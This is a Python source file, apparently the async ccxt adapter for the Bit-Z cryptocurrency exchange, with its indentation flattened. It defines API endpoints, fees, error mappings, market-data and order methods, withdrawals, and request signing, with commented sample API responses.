'id': 'bitz',
'name': 'Bit-Z',
'countries': ['HK'],
'rateLimit': 2000,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'createMarketOrder': False,
'fetchBalance': True,
'fetchDeposits': True,
'fetchClosedOrders': True,
'fetchMarkets': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': False,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '60min',
'4h': '4hour',
'1d': '1day',
'5d': '5day',
'1w': '1week',
'1M': '1mon',
},
'hostname': 'apiv2.bitz.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443304-fec5e000-c5fd-11ea-98f8-ba8e67f7eaff.jpg',
'api': {
'market': 'https://{hostname}',
'trade': 'https://{hostname}',
'assets': 'https://{hostname}',
},
'www': 'https://www.bitz.com',
'doc': 'https://apidocv2.bitz.plus/en/',
'fees': 'https://www.bitz.com/fee?type=1',
'referral': 'https://u.bitz.com/register?invite_code=1429193',
},
'api': {
'market': {
'get': [
'ticker',
'depth',
'order', # trades
'tickerall',
'kline',
'symbolList',
'getServerTime',
'currencyRate',
'currencyCoinRate',
'coinRate',
'getContractCoin',
'getContractKline',
'getContractOrderBook',
'getContractTradesHistory',
'getContractTickers',
],
},
'trade': {
'post': [
'addEntrustSheet',
'cancelEntrustSheet',
'cancelAllEntrustSheet',
'coinOut', # withdraw
'getUserHistoryEntrustSheet', # closed orders
'getUserNowEntrustSheet', # open orders
'getEntrustSheetInfo', # order
'depositOrWithdraw', # transactions
'getCoinAddress',
'getCoinAddressList',
'marketTrade',
'addEntrustSheetBatch',
],
},
'assets': {
'post': [
'getUserAssets',
],
},
'contract': {
'post': [
'addContractTrade',
'cancelContractTrade',
'getContractActivePositions',
'getContractAccountInfo',
'getContractMyPositions',
'getContractOrderResult',
'getContractTradeResult',
'getContractOrder',
'getContractMyHistoryTrade',
'getContractMyTrades',
],
},
},
'fees': {
'trading': {
'maker': 0.002,
'taker': 0.002,
},
'funding': {
'withdraw': {
'BTC': '0.5%',
'DKKT': '0.5%',
'ETH': 0.01,
'USDT': '0.5%',
'LTC': '0.5%',
'FCT': '0.5%',
'LSK': '0.5%',
'HXI': '0.8%',
'ZEC': '0.5%',
'DOGE': '0.5%',
'MZC': '0.5%',
'ETC': '0.5%',
'GXS': '0.5%',
'XPM': '0.5%',
'PPC': '0.5%',
'BLK': '0.5%',
'XAS': '0.5%',
'HSR': '0.5%',
'NULS': 5.0,
'VOISE': 350.0,
'PAY': 1.5,
'EOS': 0.6,
'YBCT': 35.0,
'OMG': 0.3,
'OTN': 0.4,
'BTX': '0.5%',
'QTUM': '0.5%',
'DASH': '0.5%',
'GAME': '0.5%',
'BCH': '0.5%',
'GNT': 9.0,
'SSS': 1500.0,
'ARK': '0.5%',
'PART': '0.5%',
'LEO': '0.5%',
'DGB': '0.5%',
'ZSC': 130.0,
'VIU': 350.0,
'BTG': '0.5%',
'ARN': 10.0,
'VTC': '0.5%',
'BCD': '0.5%',
'TRX': 200.0,
'HWC': '0.5%',
'UNIT': '0.5%',
'OXY': '0.5%',
'MCO': 0.3500,
'SBTC': '0.5%',
'BCX': '0.5%',
'ETF': '0.5%',
'PYLNT': 0.4000,
'XRB': '0.5%',
'ETP': '0.5%',
},
},
},
'precision': {
'amount': 8,
'price': 8,
},
'options': {
'fetchOHLCVVolume': True,
'fetchOHLCVWarning': True,
'lastNonceTimestamp': 0,
},
'commonCurrencies': {
# https://github.com/ccxt/ccxt/issues/3881
# https://support.bit-z.pro/hc/en-us/articles/360007500654-BOX-BOX-Token-
'BOX': 'BOX Token',
'LEO': 'LeoCoin',
'XRB': 'NANO',
'PXC': 'Pixiecoin',
'VTC': 'VoteCoin',
'TTC': 'TimesChain',
},
'exceptions': {
# '200': Success
'-102': ExchangeError, # Invalid parameter
'-103': AuthenticationError, # Verification failed
'-104': ExchangeNotAvailable, # Network Error-1
'-105': AuthenticationError, # Invalid api signature
'-106': ExchangeNotAvailable, # Network Error-2
'-109': AuthenticationError, # Invalid scretKey
'-110': DDoSProtection, # The number of access requests exceeded
'-111': PermissionDenied, # Current IP is not in the range of trusted IP
'-112': OnMaintenance, # Service is under maintenance
'-114': RateLimitExceeded, # The number of daily requests has reached the limit
'-117': AuthenticationError, # The apikey expires
'-100015': AuthenticationError, # Trade password error
'-100044': ExchangeError, # Fail to request data
'-100101': ExchangeError, # Invalid symbol
'-100201': ExchangeError, # Invalid symbol
'-100301': ExchangeError, # Invalid symbol
'-100401': ExchangeError, # Invalid symbol
'-100302': ExchangeError, # Type of K-line error
'-100303': ExchangeError, # Size of K-line error
'-200003': AuthenticationError, # Please set trade password
'-200005': PermissionDenied, # This account can not trade
'-200025': ExchangeNotAvailable, # Temporary trading halt
'-200027': InvalidOrder, # Price Error
'-200028': InvalidOrder, # Amount must be greater than 0
'-200029': InvalidOrder, # Number must be between %s and %d
'-200030': InvalidOrder, # Over price range
'-200031': InsufficientFunds, # Insufficient assets
'-200032': ExchangeError, # System error. Please contact customer service
'-200033': ExchangeError, # Fail to trade
'-200034': OrderNotFound, # The order does not exist
'-200035': OrderNotFound, # Cancellation error, order filled
'-200037': InvalidOrder, # Trade direction error
'-200038': ExchangeError, # Trading Market Error
'-200055': OrderNotFound, # Order record does not exist
'-300069': AuthenticationError, # api_key is illegal
'-300101': ExchangeError, # Transaction type error
'-300102': InvalidOrder, # Price or number cannot be less than 0
'-300103': AuthenticationError, # Trade password error
'-301001': ExchangeNotAvailable, # Network Error-3
},
})
async def fetch_markets(self, params={}):
response = await self.marketGetSymbolList(params)
#
# { status: 200,
# msg: "",
# data: { ltc_btc: { id: "1",
# name: "ltc_btc",
# coinFrom: "ltc",
# coinTo: "btc",
# numberFloat: "4",
# priceFloat: "8",
# status: "1",
# minTrade: "0.010",
# maxTrade: "500000000.000"},
# qtum_usdt: { id: "196",
# name: "qtum_usdt",
# coinFrom: "qtum",
# coinTo: "usdt",
# numberFloat: "4",
# priceFloat: "2",
# status: "1",
# minTrade: "0.100",
# maxTrade: "500000000.000"}, },
# time: 1535969146,
# microtime: "0.66955600 1535969146",
# source: "api" }
#
markets = self.safe_value(response, 'data')
ids = list(markets.keys())
result = []
for i in range(0, len(ids)):
id = ids[i]
market = markets[id]
numericId = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'coinFrom')
quoteId = self.safe_string(market, 'coinTo')
base = baseId.upper()
quote = quoteId.upper()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'numberFloat'),
'price': self.safe_integer(market, 'priceFloat'),
}
result.append({
'info': market,
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': True,
'precision': precision,
'limits': {
'amount': {
'min': self.safe_number(market, 'minTrade'),
'max': self.safe_number(market, 'maxTrade'),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.assetsPostGetUserAssets(params)
#
# {
# status: 200,
# msg: "",
# data: {
# cny: 0,
# usd: 0,
# btc_total: 0,
# info: [{
# "name": "zpr",
# "num": "37.49067275",
# "over": "37.49067275",
# "lock": "0.00000000",
# "btc": "0.00000000",
# "usd": "0.00000000",
# "cny": "0.00000000",
# }],
# },
# time: 1535983966,
# microtime: "0.70400500 1535983966",
# source: "api",
# }
#
balances = self.safe_value(response['data'], 'info')
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'name')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_string(balance, 'lock')
account['total'] = self.safe_string(balance, 'num')
account['free'] = self.safe_string(balance, 'over')
result[code] = account
return self.parse_balance(result, False)
def parse_ticker(self, ticker, market=None):
#
# { symbol: "eth_btc",
# quoteVolume: "3905.72",
# volume: "97058.21",
# priceChange: "-1.72",
# priceChange24h: "-1.65",
# askPrice: "0.03971272",
# askQty: "0.0663",
# bidPrice: "0.03961469",
# bidQty: "19.5451",
# open: "0.04036769",
# high: "0.04062988",
# low: "0.03956123",
# now: "0.03970100",
# firstId: 115567767,
# lastId: 115795316,
# dealCount: 14078,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "1959.05",
# usd: "287.10",
# krw: "318655.82" }
#
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
last = self.safe_number(ticker, 'now')
open = self.safe_number(ticker, 'open')
change = None
average = None
if last is not None and open is not None:
change = last - open
average = self.sum(last, open) / 2
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bidPrice'),
'bidVolume': self.safe_number(ticker, 'bidQty'),
'ask': self.safe_number(ticker, 'askPrice'),
'askVolume': self.safe_number(ticker, 'askQty'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': self.safe_number(ticker, 'priceChange24h'),
'average': average,
'baseVolume': self.safe_number(ticker, 'volume'),
'quoteVolume': self.safe_number(ticker, 'quoteVolume'),
'info': ticker,
}
def parse_microtime(self, microtime):
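        """Convert a Bit-Z "microtime" string into a millisecond timestamp,
        e.g. "0.76341900 1535970397" -> 1535970397763."""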
if microtime is None:
return microtime
parts = microtime.split(' ')
milliseconds = float(parts[0])
seconds = int(parts[1])
total = self.sum(seconds, milliseconds)
return int(total * 1000)
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = await self.marketGetTicker(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { symbol: "eth_btc",
# quoteVolume: "3905.72",
# volume: "97058.21",
# priceChange: "-1.72",
# priceChange24h: "-1.65",
# askPrice: "0.03971272",
# askQty: "0.0663",
# bidPrice: "0.03961469",
# bidQty: "19.5451",
# open: "0.04036769",
# high: "0.04062988",
# low: "0.03956123",
# now: "0.03970100",
# firstId: 115567767,
# lastId: 115795316,
# dealCount: 14078,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "1959.05",
# usd: "287.10",
# krw: "318655.82" },
# time: 1535970397,
# microtime: "0.76341900 1535970397",
# source: "api" }
#
ticker = self.parse_ticker(response['data'], market)
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
request = {}
if symbols is not None:
ids = self.market_ids(symbols)
request['symbols'] = ','.join(ids)
response = await self.marketGetTickerall(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { ela_btc: { symbol: "ela_btc",
# quoteVolume: "0.00",
# volume: "3.28",
# priceChange: "0.00",
# priceChange24h: "0.00",
# askPrice: "0.00147984",
# askQty: "5.4580",
# bidPrice: "0.00120230",
# bidQty: "12.5384",
# open: "0.00149078",
# high: "0.00149078",
# low: "0.00149078",
# now: "0.00149078",
# firstId: 115581219,
# lastId: 115581219,
# dealCount: 1,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "73.66",
# usd: "10.79",
# krw: "11995.03" } },
# time: 1535971578,
# microtime: "0.39854200 1535971578",
# source: "api" }
#
tickers = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
result = {}
ids = list(tickers.keys())
for i in range(0, len(ids)):
id = ids[i]
ticker = tickers[id]
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
ticker = self.parse_ticker(tickers[id], market)
symbol = ticker['symbol']
if symbol is None:
if market is not None:
symbol = market['symbol']
else:
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if symbol is not None:
result[symbol] = self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.filter_by_array(result, 'symbol', symbols)
async def fetch_time(self, params={}):
response = await self.marketGetGetServerTime(params)
#
# {
# "status":200,
# "msg":"",
# "data":[],
# "time":1555490875,
# "microtime":"0.35994200 1555490875",
# "source":"api"
# }
#
return self.safe_timestamp(response, 'time')
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
response = await self.marketGetDepth(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { asks: [["10.00000000", "0.4426", "4.4260"],
# ["1.00000000", "0.8339", "0.8339"],
# ["0.91700000", "0.0500", "0.0458"],
# ["0.20000000", "0.1000", "0.0200"],
# ["0.03987120", "16.1262", "0.6429"],
# ["0.03986120", "9.7523", "0.3887"] ],
# bids: [["0.03976145", "0.0359", "0.0014"],
# ["0.03973401", "20.9493", "0.8323"],
# ["0.03967970", "0.0328", "0.0013"],
# ["0.00000002", "10000.0000", "0.0002"],
# ["0.00000001", "231840.7500", "0.0023"]],
# coinPair: "eth_btc" },
# time: 1535974778,
# microtime: "0.04017400 1535974778",
# source: "api" }
#
orderbook = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.parse_order_book(orderbook, timestamp)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp(trade, 'T')
symbol = None
if market is not None:
symbol = market['symbol']
price = self.safe_number(trade, 'p')
amount = self.safe_number(trade, 'n')
cost = None
if price is not None:
if amount is not None:
cost = self.price_to_precision(symbol, amount * price)
side = self.safe_string(trade, 's')
return {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': None,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
'info': trade,
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = await self.marketGetOrder(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: [{id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
# {id: 115806811,
# t: "19:33:19",
# T: 1535974399,
# p: "0.03981135",
# n: "9.4612",
# s: "sell" } ],
# time: 1535974583,
# microtime: "0.57118100 1535974583",
# source: "api" }
#
return self.parse_trades(response['data'], market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# time: "1535973420000",
# open: "0.03975084",
# high: "0.03975084",
# low: "0.03967700",
# close: "0.03967700",
# volume: "12.4733",
# datetime: "2018-09-03 19:17:00"
# }
#
return [
self.safe_integer(ohlcv, 'time'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'volume'),
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
duration = self.parse_timeframe(timeframe) * 1000
market = self.market(symbol)
request = {
'symbol': market['id'],
'resolution': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = min(limit, 300) # 1-300
if since is not None:
request['to'] = self.sum(since, limit * duration * 1000)
else:
if since is not None:
raise ArgumentsRequired(self.id + ' fetchOHLCV() requires a limit argument if the since argument is specified')
response = await self.marketGetKline(self.extend(request, params))
#
# {
# status: 200,
# msg: "",
# data: {
# bars: [
# {time: "1535973420000", open: "0.03975084", high: "0.03975084", low: "0.03967700", close: "0.03967700", volume: "12.4733", datetime: "2018-09-03 19:17:00"},
# {time: "1535955480000", open: "0.04009900", high: "0.04016745", low: "0.04009900", close: "0.04012074", volume: "74.4803", datetime: "2018-09-03 14:18:00"},
# ],
# resolution: "1min",
# symbol: "eth_btc",
# from: "1535973420000",
# to: "1535955480000",
# size: 300
# },
# time: 1535973435,
# microtime: "0.56462100 1535973435",
# source: "api"
# }
#
data = self.safe_value(response, 'data', {})
bars = self.safe_value(data, 'bars', [])
return self.parse_ohlcvs(bars, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open', # partially filled
'2': 'closed', # filled
'3': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "id": "693248739", # order id
# "uId": "2074056", # uid
# "price": "100", # price
# "number": "10", # number
# "numberOver": "10", # undealed
# "flag": "sale", # flag
# "status": "0", # unfilled
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "numberDeal": "0" # dealed
# }
#
id = self.safe_string(order, 'id')
symbol = None
if market is None:
baseId = self.safe_string(order, 'coinFrom')
quoteId = self.safe_string(order, 'coinTo')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.safe_value(self.markets_by_id, marketId)
else:
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if market is not None:
symbol = market['symbol']
side = self.safe_string(order, 'flag')
if side is not None:
side = 'sell' if (side == 'sale') else 'buy'
price = self.safe_number(order, 'price')
amount = self.safe_number(order, 'number')
remaining = self.safe_number(order, 'numberOver')
filled = self.safe_number(order, 'numberDeal')
timestamp = self.safe_integer(order, 'timestamp')
if timestamp is None:
timestamp = self.safe_timestamp(order, 'created')
cost = self.safe_number(order, 'orderTotalPrice')
status = self.parse_order_status(self.safe_string(order, 'status'))
return self.safe_order({
'id': id,
'clientOrderId': None,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': 'limit',
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'trades': None,
'fee': None,
'info': order,
'average': None,
})
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
if type != 'limit':
raise ExchangeError(self.id + ' createOrder allows limit orders only')
market = self.market(symbol)
orderType = '1' if (side == 'buy') else '2'
if not self.password:
raise ExchangeError(self.id + ' createOrder() requires you to set exchange.password = "YOUR_TRADING_PASSWORD"(a trade password is NOT THE SAME as your login password)')
request = {
'symbol': market['id'],
'type': orderType,
'price': self.price_to_precision(symbol, price),
'number': self.amount_to_precision(symbol, amount),
'tradePwd': self.password,
}
response = await self.tradePostAddEntrustSheet(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "id": "693248739", # order id
# "uId": "2074056", # uid
# "price": "100", # price
# "number": "10", # number
# "numberOver": "10", # undealed
# "flag": "sale", # flag
# "status": "0", # unfilled
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "numberDeal": "0" # dealed
# },
# "time": "1533035297",
# "microtime": "0.41892000 1533035297",
# "source": "api",
# }
#
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
order = self.extend({
'timestamp': timestamp,
}, response['data'])
return self.parse_order(order, market)
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'entrustSheetId': id,
}
response = await self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"1000.00000000",
# "lock":"-1000.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"9999.99999999",
# "lock":"9999.99999999"
# }
# },
# "time":"1535464383",
# "microtime":"0.91558000 1535464383",
# "source":"api"
# }
#
return response
async def cancel_orders(self, ids, symbol=None, params={}):
await self.load_markets()
request = {
'ids': ','.join(ids),
}
response = await self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "744173808":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"899.99999999",
# "lock":"19099.99999999"
# }
# },
# "744173809":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"999.99999999",
# "lock":"18999.99999999"
# }
# }
# },
# "time":"1535525649",
# "microtime":"0.05009400 1535525649",
# "source":"api"
# }
#
return response
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'entrustSheetId': id,
}
response = await self.tradePostGetEntrustSheetInfo(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":"708279852",
# "uId":"2074056",
# "price":"100.00000000",
# "number":"10.0000",
# "total":"0.00000000",
# "numberOver":"10.0000",
# "numberDeal":"0.0000",
# "flag":"sale",
# "status":"0", #0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "coinFrom":"bz",
# "coinTo":"usdt",
# "orderTotalPrice":"0",
# "created":"1533279876"
# },
# "time":"1533280294",
# "microtime":"0.36859200 1533280294",
# "source":"api"
# }
#
return self.parse_order(response['data'])
async def fetch_orders_with_method(self, method, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
request = {
'coinFrom': market['baseId'],
'coinTo': market['quoteId'],
# 'type': 1, # optional integer, 1 = buy, 2 = sell
# 'page': 1, # optional integer
# 'pageSize': 100, # optional integer, max 100
# 'startTime': 1510235730, # optional integer timestamp in seconds
# 'endTime': 1510235730, # optional integer timestamp in seconds
}
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
if since is not None:
request['startTime'] = int(since / 1000)
# request['endTime'] = int(since / 1000)
response = await getattr(self, method)(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "data": [
# {
# "id": "693248739",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3", # 0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "isNew": "N",
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "created": "1533035300",
# },
# {
# "id": "723086996",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3",
# "isNew": "N",
# "coinFrom": "bz",
# "coinTo": "usdt",
# "created": "1533523568",
# },
# ],
# "pageInfo": {
# "limit": "10",
# "offest": "0",
# "current_page": "1",
# "page_size": "10",
# "total_count": "17",
# "page_count": "2",
# }
# },
# "time": "1533279329",
# "microtime": "0.15305300 1533279329",
# "source": "api"
# }
#
orders = self.safe_value(response['data'], 'data', [])
return self.parse_orders(orders, None, since, limit)
async def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_with_method('tradePostGetUserNowEntrustSheet', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'1': 'pending',
'2': 'pending',
'3': 'pending',
'4': 'ok',
'5': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# {
# "id": '96275',
# "uid": '2109073',
# "wallet": '0xf4c4141c0127bc37b1d0c409a091920eba13ada7',
# "txid": '0xb7adfa52aa566f9ac112e3c01f77bd91179b19eab12092a9a5a8b33d5086e31d',
# "confirm": '12',
# "number": '0.50000000',
# "status": 4,
# "updated": '1534944168605',
# "addressUrl": 'https://etherscan.io/address/',
# "txidUrl": 'https://etherscan.io/tx/',
# "description": 'Ethereum',
# "coin": 'eth',
# "memo": ''
# }
#
# {
# "id":"397574",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"",
# "confirm":"0",
# "number":"1000.00000000",
# "status":1,
# "updated":"0",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# {
# "id":"153606",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"aa2b179f84cd6dedafd41845e0fbf7f01e14c0d71ea3140d03d6f5a9ccd93199",
# "confirm":"0",
# "number":"761.11110000",
# "status":4,
# "updated":"1536726133579",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# withdraw
#
# {
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# }
#
timestamp = self.safe_integer(transaction, 'updated')
if timestamp == 0:
timestamp = None
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
fee = None
feeCost = self.safe_number(transaction, 'network_fee')
if feeCost is not None:
fee = {
'cost': feeCost,
'code': code,
}
return {
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'wallet'),
'tag': self.safe_string(transaction, 'memo'),
'type': type,
'amount': self.safe_number(transaction, 'number'),
'currency': code,
'status': status,
'updated': timestamp,
'fee': fee,
'info': transaction,
}
def parse_transactions_by_type(self, type, transactions, code=None, since=None, limit=None):
result = []
for i in range(0, len(transactions)):
transaction = self.parse_transaction(self.extend({
'type': type,
}, transactions[i]))
result.append(transaction)
return self.filter_by_currency_since_limit(result, code, since, limit)
def parse_transaction_type(self, type):
types = {
'deposit': 1,
'withdrawal': 2,
}
return self.safe_integer(types, type, type)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return await self.fetch_transactions_for_type('deposit', code, since, limit, params)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return await self.fetch_transactions_for_type('withdrawal', code, since, limit, params)
async def fetch_transactions_for_type(self, type, code=None, since=None, limit=None, params={}):
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument')
await self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'type': self.parse_transaction_type(type),
}
if since is not None:
            request['startTime'] = int(since / 1000)
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
response = await self.tradePostDepositOrWithdraw(self.extend(request, params))
transactions = self.safe_value(response['data'], 'data', [])
return self.parse_transactions_by_type(type, transactions, code, since, limit)
async def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'number': self.currency_to_precision(code, amount),
'address': address,
# 'type': 'erc20', # omni, trc20, optional
}
if tag is not None:
request['memo'] = tag
response = await self.tradePostCoinOut(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# },
# "time":1552641646,
# "microtime":"0.70304500 1552641646",
# "source":"api"
# }
#
data = self.safe_value(response, 'data', {})
return self.parse_transaction(data, currency)
def nonce(self):
currentTimestamp = self.seconds()
if currentTimestamp > self.options['lastNonceTimestamp']:
self.options['lastNonceTimestamp'] = currentTimestamp
self.options['lastNonce'] = 100000
self.options['lastNonce'] = self.sum(self.options['lastNonce'], 1)
return self.options['lastNonce']
def sign(self, path, api='market', method='GET', params={}, headers=None, body=None):
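        """Public 'market' endpoints are plain GET requests with url-encoded query
        params; trade/assets endpoints are POSTs whose form body carries apiKey,
        timeStamp and nonce plus a 'sign' field: the hex digest (ccxt's default
        hash) of the raw-encoded, key-sorted parameters concatenated with the
        API secret."""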
baseUrl = self.implode_params(self.urls['api'][api], {'hostname': self.hostname})
url = baseUrl + '/' + self.capitalize(api) + '/' + path
query = None
if api == 'market':
query = self.urlencode(params)
if len(query):
url += '?' + query
else:
self.check_required_credentials()
body = self.rawencode(self.keysort(self.extend({
'apiKey': self.apiKey,
'timeStamp': self.seconds(),
'nonce': self.nonce(),
}, params)))
body += '&sign=' + self.hash(self.encode(body + self.secret))
headers = {'Content-type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
status = self.safe_string(response, 'status')
if status is not None:
feedback = self.id + ' ' + body
#
# {"status":-107,"msg":"","data":"","time":1535968848,"microtime":"0.89092200 1535968848","source":"api"}
#
if status == '200':
#
# {"status":200,"msg":"","data":-200031,"time":1535999806,"microtime":"0.85476800 1535999806","source":"api"}
#
code = self.safe_integer(response, 'data')
if code is not None:
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
else:
return # no error
self.throw_exactly_matched_exception(self.exceptions, status, feedback)
raise ExchangeError(feedback)
|
